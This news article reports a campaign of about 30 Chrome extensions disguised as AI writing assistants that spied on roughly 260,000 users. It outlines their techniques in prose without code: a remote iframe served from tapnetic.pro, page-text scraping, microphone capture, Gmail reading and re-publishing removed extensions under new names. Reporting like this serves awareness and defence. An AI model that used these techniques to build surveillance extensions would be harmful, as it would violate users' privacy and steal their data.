Mass Surveillance: Fake AI Extensions Compromise Chrome Users

Cybersecurity researchers have discovered a malicious campaign involving Chrome browser extensions disguised as artificial intelligence assistants. Approximately 260,000 users have been affected by 30 extensions that, although appearing distinct, share the same internal code and infrastructure.

These extensions, which installed under the promise of assisting with writing texts and emails, presented a facade of legitimacy and possessed elevated permissions, essential for their operation, but also represent a significant vulnerability.

Deceptive Operation

The extensions were labeled as AI assistants, promising various functionalities. Over 260,000 installations occurred, many of them promoted by a "Featured" badge from Google’s official extension store, which increases user trust.

The attackers employed a technique called remote iframe. This allows the extension to open an embedded window that loads content from an external server, in this case, controlled by the criminals. The server was named tapnetic.pro, and its content could be altered at any moment.

Data Capture and Espionage

The content in question included text from pages the victim was accessing, extracted with the help of a Readability library from Mozilla. The theft of information extended even to internal company pages and authenticated systems.

Additionally, the extension could activate the victim's microphone, using the Web Speech API, to record conversations without the user’s consent, cataloging critical information.

Gmail Espionage

One in every two extensions had a module specialized in spying on Gmail. These scripts were activated as soon as the page began to load, allowing attackers to read the content of the emails accessed by the victims.

The extension could also monitor and capture conversations and compositions in real time, sending data to the attackers' servers.

Remote Control Infrastructure

The malicious operation was coordinated from the domain tapnetic.pro, characterizing a command and control (C2) infrastructure. The site used by the attackers had a common appearance but did not offer real services, serving only as a front.

The subdomains allowed that if one of them was blocked, others would continue to function, ensuring the continuity of the operation.

Evading Tactics

The criminals demonstrated skill in circumventing extension removals. Removed extensions quickly reappeared under new names but with the same code, utilizing the technique known as extension spraying, which increases the resilience of the operation.

Campaign Implications

The sophisticated combination of factors, such as trust in AI extensions, the apparent legitimacy conferred by the Chrome Web Store, and the technical architecture that obscures true functionality, results in a system difficult to detect.

This situation raises concerns about the security and privacy of users on the internet, highlighting the need for greater vigilance and digital education. The evolution of these tactics serves as a warning about the risks associated with using seemingly secure technology.